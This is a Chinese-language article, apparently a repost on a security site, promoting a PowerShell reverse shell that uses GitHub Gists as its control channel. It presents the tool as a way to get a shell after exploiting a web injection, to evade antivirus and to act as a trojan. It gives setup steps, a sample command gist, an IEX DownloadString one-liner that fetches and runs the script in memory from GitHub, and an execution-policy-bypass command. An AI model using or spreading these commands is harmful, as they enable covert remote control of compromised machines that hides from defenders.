Powershell-Github-Shell:利用Github来做控制端的Powershell版本的Shell

项目主页

https://github.com/zlocal/Powershell-Github-Shell

Author:zshell

简介

一般遇到比如说需要执行代码的时候就反弹一个shell回来.比如,一个SA权限的aspx注入,盲注的话,查结果又异常的麻烦,大多情况可能用nc会比较多,但NC的麻烦和限制或者是需要上传文件上去,而且如果是NAT情况又要有一个外网的服务器来监听使其回连。想到现在流行的windows 2008和win7及以上的比较主流,于是就周末时间利用了powershell,通过GITHUB的GIST接口实现一个反弹的shell.

特点

  1. 无程序,可以使用一句话远程内存加载powershell执行,不被杀。
  2. HTTPS协议,在保密性和穿透性上优
  3. 易于扩展其它功能,比如加上文件上传下载就相当于是款不错的马。
  4. 不需要配置域名和VPS等,直接利用github提供命令和结果获取。
  5. 程序运行期间更改gist的命令后,只需要等待设定时间,即可获取结果,自动写入评论回复中,需要URL DECODE查看
    最初是在Powershell V3.0下开发,发现兼容性问题,于是又改成了2.0可以执行的,即支持Win7和Win2008及以上。
    当前版本只支持了CMD命令执行,至于其它功能,如文件上下传,开机启动,Powershell语句执行,后续需求来开发。

使用方法

1, 创建github账户,访问https://github.com/settings/tokens/new 选中 gist Create gists ,创建访问Gists的token.

2, 访问 https://gist.github.com/ ,创建一个Gist,属性最好为private,只有自己能访问查看结果,名称为cmd.例:

为了展示,我设置了public:https://gist.github.com/zlocal/1d449f3c195531c8cafbebfe808ea46e

cmd · GitHub

Command:"time /T"
ReadFile:"c:/windows/temp/1.txt"
WriteFile:"http://www.github.com/raw/1.zip c:/wnidows/temp/2.txt"
Powershell:"Get-Process | Out-String"
Command:"whoami"

其中

  • Command后是想要执行的cmd命令,功能已测试OK
  • ReadFile是上传目标机器上的文件到Github,暂未实现
  • WriteFile下载文件到目标机器,暂未实现
  • Powershell后是可以执行的Powershell指令,暂未实现

3, 修改Powershell脚本的头部配置信息

$gistsUser="gitusername"; # github的用户名
$gistsApiToken="gittoken"; # 上步中得到的token ,例eed4239e439034a92fc4cbe0fbd2ca906999a9f1
$checkTime=60; # 每次获取命令结果需要等待的时间,秒为单位

4, 使powershell在目标机器上执行

Powershell执行方法

一句话远程加载(推荐)

powershell IEX (New-Object 
System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/zlocal/Powershell-Github-
Shell/master/PGShell.ps1')

一句话本地加载

powershell IEX ([System.IO.File]::readAllText('PowershellGitShell.ps1')); //powershell

一句话文件执行

powershell -executionPolicy bypass -File "c:/test/PowershellGitShell.ps1" //powershell

5, 可以修改cmd gist的内容,在$checkTime秒后刷新网页,结果会在评论中。结果需要使用URL DECODE解码。

 

*转载请注明来自MottoIN

 

原创文章,作者:SecToolkit,如若转载,请注明出处:http://www.mottoin.com/tools/94685.html

发表评论

登录后才能评论

评论列表(1条)

  • reboot 2017年1月22日 下午4:31

    越来越高大上了

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code